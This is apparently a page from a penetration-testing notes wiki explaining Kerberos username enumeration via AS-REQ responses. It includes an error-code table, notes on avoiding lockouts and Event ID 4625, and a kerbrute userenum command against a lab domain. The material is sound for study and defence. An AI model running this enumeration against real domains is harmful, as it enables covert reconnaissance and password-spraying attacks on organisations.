User Enumeration

Kerberos responds differently to an AS‑REQ depending on whether the requested username exists in the domain. This behaviour allows attackers to enumerate valid usernames without performing full authentication attempts. Unlike traditional brute‑force methods, this approach does not generate the standard Windows logon failure event (Event ID 4625), because the authentication process does not reach the stage where a logon attempt is formally recorded. Instead, the username is validated by sending a single UDP request to the KDC and analysing the response. User enumeration is typically performed by sending AS‑REQ messages without pre‑authentication data.

Kerberos Error

User Status

KDC_ERR_PREAUTH_REQUIRED

Present/Enabled

KDC_ERR_CLIENT_REVOKED

Locked/Disabled

KDC_ERR_C_PRINCIPAL_UNKNOWN

Does not exist

This process does not increment failed logon counters and therefore does not cause account lockouts. In most environments, it also generates minimal logging, although if advanced Kerberos auditing is enabled, Event ID 4768 may still be recorded. This technique is commonly automated with tools such as Kerbrute, which streamlines username enumeration and password spraying using Kerberos protocol behaviour.

# Enumerate users
kerbrute userenum users.txt --dc dc01.marvel.local -d marvel.local

PreviousPassword Spraying NextLateral Movement

Last updated 4 hours ago